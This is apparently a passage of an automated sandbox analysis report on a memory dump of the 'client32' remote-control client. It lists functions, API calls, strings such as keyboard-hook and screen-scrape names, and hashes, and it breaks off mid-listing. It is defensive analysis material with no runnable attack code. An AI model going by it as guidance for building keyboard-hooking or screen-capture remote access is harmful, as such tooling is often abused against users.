K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
SetLastError.KERNEL32(00000078), ref: 11134A11
FreeLibrary.KERNEL32(?), ref: 11134B7B
FreeLibrary.KERNEL32(?), ref: 11134B88
FreeLibrary.KERNEL32(?), ref: 11134B92

Strings

Date=%04d-%02d-%02d, xrefs: 111348BB
GetProcessHandleCount, xrefs: 1113495B
GetProcessMemoryInfo, xrefs: 111349F2
_debug, xrefs: 11134882
RestartMB, xrefs: 11134ACC
RestartUserObj, xrefs: 11134B45
psapi.dll, xrefs: 111348D3
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11134A83
CheckLeaks, xrefs: 1113487D
RestartGdiObj, xrefs: 11134B1E
Client, xrefs: 11134AD1, 11134AFC, 11134B23, 11134B4A
GetGuiResources, xrefs: 1113498E, 111349B6
RestartHandles, xrefs: 11134AF7

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
API String ID: 263027137-1001504656
Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55

Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501

Strings

WTSFreeMemory, xrefs: 1102E631
ListenPort, xrefs: 1102E4D0
DisableConsoleClient, xrefs: 1102E437
Error x%x reading %s, sesh=%d, xrefs: 1102E381
TSMode, xrefs: 1102E4B0
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
ts macaddr=%s, xrefs: 1102E5EC
client32.ini, xrefs: 1102E325
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
124406, xrefs: 1102E715, 1102E93C, 1102E9B1
, xrefs: 1102E685
client32 dbi %hs, xrefs: 1102E993
TCPIP, xrefs: 1102E4D5
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
WTSQuerySessionInformationA, xrefs: 1102E56E
MacAddress, xrefs: 1102E5FF
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
ClientName, xrefs: 1102E6B5
Wtsapi32.dll, xrefs: 1102E4FC
screenscrape, xrefs: 1102E4E8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $124406$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-4090447958
Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
FreeLibrary.KERNEL32(00000000), ref: 111420D3
LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
_memset.LIBCMT ref: 11142169
LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
GetStockObject.GDI32(00000000), ref: 111421C3
RegisterClassExA.USER32(?), ref: 111421DA
LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
#17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3

Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0BAD89F8,11030346,00000000), ref: 11017A6E
Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8

Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0

Strings

InitUI (%d), xrefs: 1114203C
TraceCopyData, xrefs: 111422DC
_debug, xrefs: 111422E1
imm32, xrefs: 111420EC
NSMGetAppIcon(), xrefs: 11142196
View, xrefs: 111422C1
pcihooks, xrefs: 1114226D
HookKeyboard, xrefs: 11142281
_License, xrefs: 11142122
riched32.dll, xrefs: 111423DE
NSMWClass, xrefs: 11142147, 111421D3
User32.dll, xrefs: 11142057
*quiet, xrefs: 1114211D
UI.CPP, xrefs: 11142191, 111421EC

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 3706574701-3145203681
Opcode ID: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
Opcode Fuzzy Hash: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,73C61370,?,0000001A), ref: 11028CFD
_strrchr.LIBCMT ref: 11028D0C

Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB

Strings

SupportWWW, xrefs: 11028FB5
NSSTLA, xrefs: 11028F85
\, xrefs: 11028C8C
??F, xrefs: 11029290
NSSAppDataDir, xrefs: 11029045
TechConsole, xrefs: 1102913D
NSSConfName, xrefs: 11029075
NSSName, xrefs: 11028F55
Name, xrefs: 11028E5E
SupportsChrome, xrefs: 11029106
Home, xrefs: 11028EF5
AssistantName, xrefs: 110290AC
SupportEMail, xrefs: 11028FE5
product.dat, xrefs: 11028CC0, 11028D11
NSMAppDataDir, xrefs: 11029015
??I, xrefs: 11029317
SupportsAndroid, xrefs: 110291A2
LongName, xrefs: 11028E95
AssistantURL, xrefs: 110290D9
NSSLongCaption, xrefs: 11029175
TLA, xrefs: 11028F25
ShortName, xrefs: 11028EC5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 11030F12
RegCloseKey.KERNEL32(?), ref: 11031037

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

Strings

Error %s unloading audiocap dll, xrefs: 11031603
&, xrefs: 11031585
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11030EFE
j0U, xrefs: 11031554
CurrentMinorVersionNumber, xrefs: 11031000
CurrentVersion, xrefs: 11030F35
CurrentMajorVersionNumber, xrefs: 11030FCD
j, xrefs: 11031341
pcicl32, xrefs: 110314C5
, xrefs: 110313C2
*, xrefs: 11031381
3, xrefs: 11031066
.%d, xrefs: 110313F6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
API String ID: 1620732580-3468083601
Opcode ID: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
Opcode Fuzzy Hash: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
LoadLibraryA.KERNEL32(?), ref: 11086ABC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30

Strings

CipherServer_ResetSession, xrefs: 11086B5D
CipherServer_EncryptBlocks, xrefs: 11086B2A
CipherServer_CloseSession, xrefs: 11086B19
CipherServer_GetRandomData, xrefs: 11086B4C
CipherServer_GetInfoBlock, xrefs: 11086AF7
CipherServer_OpenSession, xrefs: 11086B08
CipherServer_Create, xrefs: 11086AD1
CipherServer_DecryptBlocks, xrefs: 11086B3B
CryptPak.dll, xrefs: 11086A2B, 11086A8E
CipherServer_Destroy, xrefs: 11086AE6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54

Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 111424BA

Strings

TracePolicyChange, xrefs: 11142961
Info. Policy changed - re-initui, xrefs: 11142B92
_debug, xrefs: 11142966
NSM.LIC, xrefs: 111424C0
NSA.LIC, xrefs: 111424CF
Del [%s]%s=%s, xrefs: 11142A15
IKS.LIC, xrefs: 111424DF, 111424E6, 1114250D
Warning. Can't calc AD policy changes, xrefs: 11142905
Info. Lockup averted for AD policy changes, xrefs: 1114269D, 111426C4
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11142C48
RoomSpec, xrefs: 11142947, 11142BFA
Client, xrefs: 1114294C, 11142BFF
client, xrefs: 111428E3
Chg [%s]%s=%s, xrefs: 11142A75
Add [%s]%s=%s, xrefs: 111429B6
client., xrefs: 111428C6
IsA(), xrefs: 11142C4D
Info. Policy changed - reload transports..., xrefs: 11142BB6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3535843008-1834795898
Opcode ID: bee2d1a29475935e332d1de4ecb9706c0764932438faa67543dab612aa85e2e2
Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
Opcode Fuzzy Hash: bee2d1a29475935e332d1de4ecb9706c0764932438faa67543dab612aa85e2e2
Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294
threadtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
_strncpy.LIBCMT ref: 11074E38
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
std::exception::exception.LIBCMT ref: 11075038
__CxxThrowException@8.LIBCMT ref: 11075053

Strings

..\ctl32\Connect.cpp, xrefs: 11074DE6
destroy_queue == NULL, xrefs: 11074DEB
DefaultUsername, xrefs: 11074E80
RememberPassword, xrefs: 11074E50
General, xrefs: 11074E55, 11074E85, 11074EF8
Password, xrefs: 11074EF3

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
API String ID: 703120326-1497550179
Opcode ID: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
Opcode Fuzzy Hash: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

PostMessageA.USER32(0002045A,000006CF,00000007,00000000), ref: 11139C4F

